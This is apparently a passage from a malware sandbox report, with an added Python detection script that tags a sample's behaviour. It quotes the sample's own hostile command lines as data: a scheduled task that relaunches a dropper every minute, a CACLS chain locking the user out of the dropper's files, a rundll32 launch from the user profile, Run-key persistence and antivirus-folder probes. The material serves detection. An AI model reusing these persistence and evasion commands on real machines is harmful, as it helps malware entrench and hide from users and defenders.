3221225785 (0xC0000139, STATUS_ENTRYPOINT_NOT_FOUND: ntdll exports no wine_get_version, so the Wine check is negative) 0
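The behavioural artifacts in this section (the SCHTASKS and CACLS command lines, the rundll32 launch of a DLL in the user profile, the HKCU Run values, the ProgramData vendor-folder probes, the SeDebugPrivilege lookup and the LdrGetProcedureAddress lookup of ntdll!wine_get_version) are what a detection rule set would key on. The block below is an added example, not code from the sandbox or from any detection product: the event dict shape, rule names and tactic labels are its own choices, the string values in SAMPLE_EVENTS are copied from the lines above, and the C:\ProgramData\Microsoft entry is a constructed negative control.

```python
"""Added example (not part of the sandbox report): tag the report's command
lines, Run values, file probes and API calls with the technique each indicates.
Event shape and rule names are constructed; values are from the report."""
import re

AV_VENDOR_DIRS = {"avast software", "avira", "kaspersky lab", "panda security",
                  "bitdefender", "avg", "doctor web"}   # vendor folders probed above
USER_PROFILE = re.compile(r"c:\\users\\[^\\]+\\", re.I)
SCHTASKS_MINUTE = re.compile(
    r'schtasks(?:\.exe)?"?\s+/create\b.*?/sc\s+minute\b.*?/mo\s+1\b.*?/tr\s+"?(?P<target>[^"]+)', re.I)
CACLS_DENY = re.compile(r'cacls\s+"(?P<obj>[^"]+)"\s+/p\s+"(?P<user>[^":]+):n"', re.I)
RUNDLL32 = re.compile(r"rundll32(?:\.exe)?\s+(?P<dll>[^,]+\.dll)\s*,\s*(?P<export>\S+)", re.I)
PS_GETPROC = re.compile(r"powershell\b.*\bget-process\s+(?P<proc>\S+)", re.I)
AV_DIR = re.compile(r"c:\\programdata\\(?P<vendor>[^\\]+)$", re.I)


def check_cmdline(cmd: str) -> list:
    hits = []
    m = SCHTASKS_MINUTE.search(cmd)
    if m and USER_PROFILE.search(m.group("target")):   # one-minute task pointing into the profile
        hits.append(("persistence", "schtasks every minute -> " + m.group("target")))
    for m in CACLS_DENY.finditer(cmd):                 # deny-ACL placed on the dropper's own file/dir
        hits.append(("defense-evasion", f"CACLS deny {m.group('user')} on {m.group('obj')}"))
    m = RUNDLL32.search(cmd)
    if m and USER_PROFILE.search(m.group("dll")):       # rundll32 loading a DLL from the user profile
        hits.append(("execution", f"rundll32 {m.group('dll').strip()},{m.group('export')}"))
    m = PS_GETPROC.search(cmd)
    if m:
        hits.append(("discovery", "process probe: " + m.group("proc")))
    return hits


def check_run_key(key: str, value: str) -> list:
    if "\\currentversion\\run\\" in key.lower() and USER_PROFILE.search(value):
        return [("persistence", f"Run value {key.rsplit(chr(92), 1)[-1]} -> {value}")]
    return []


def check_file(path: str) -> list:
    m = AV_DIR.match(path)
    if m and m.group("vendor").lower() in AV_VENDOR_DIRS:
        return [("discovery", "AV install probe: " + m.group("vendor"))]
    return []


def check_api(name: str, args: dict) -> list:
    if name == "LdrGetProcedureAddress" and args.get("function_name") == "wine_get_version":
        return [("anti-analysis", "ntdll!wine_get_version lookup (Wine/sandbox check)")]
    if name == "LookupPrivilegeValueW" and args.get("privilege_name") == "SeDebugPrivilege":
        return [("privilege", "SeDebugPrivilege lookup")]
    return []


def analyze(events) -> list:
    """Return (tactic, detail) pairs for every rule an event triggers."""
    findings = []
    for ev in events:
        kind = ev["type"]
        if kind == "cmdline":
            findings.extend(check_cmdline(ev["value"]))
        elif kind == "reg_key":
            findings.extend(check_run_key(ev["key"], ev["value"]))
        elif kind == "file":
            findings.extend(check_file(ev["path"]))
        elif kind == "api":
            findings.extend(check_api(ev["name"], ev.get("args", {})))
    return findings


def tactics(events) -> set:
    return {tactic for tactic, _ in analyze(events)}


SAMPLE_EVENTS = [  # string values copied from the report; dict shape constructed here
    {"type": "cmdline", "value": r'SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\03bd543fce\gntuud.exe" /F'},
    {"type": "cmdline", "value": r'"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y|CACLS "..\03bd543fce" /P "test22:N"&&CACLS "..\03bd543fce" /P "test22:R" /E&&Exit'},
    {"type": "cmdline", "value": r"rundll32.exe C:\Users\test22\1000019012\syncfiles.dll, rundll"},
    {"type": "cmdline", "value": "powershell get-process avastui"},
    {"type": "reg_key", "key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Emit64.exe",
     "value": r"C:\Users\test22\AppData\Local\Temp\1000017001\Emit64.exe"},
    {"type": "reg_key", "key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\syncfiles.dll",
     "value": r"rundll32 C:\Users\test22\1000019012\syncfiles.dll, rundll"},
    {"type": "file", "path": r"C:\ProgramData\AVAST Software"},
    {"type": "file", "path": r"C:\ProgramData\Doctor Web"},
    {"type": "file", "path": r"C:\ProgramData\Microsoft"},  # constructed negative: not an AV vendor
    {"type": "api", "name": "LdrGetProcedureAddress", "args": {"module": "ntdll", "function_name": "wine_get_version"}},
    {"type": "api", "name": "LookupPrivilegeValueW", "args": {"privilege_name": "SeDebugPrivilege"}},
]

if __name__ == "__main__":
    for tactic, detail in analyze(SAMPLE_EVENTS):
        print(f"{tactic:<16} {detail}")
```

The CACLS rule is the one worth keeping in production telemetry: denying the executing user access to a file and directory the same process just created is rare in legitimate software, whereas a one-minute scheduled task or a Run value alone will also fire on updaters, so those two are better scored together with the ProgramData probes than alerted on individually.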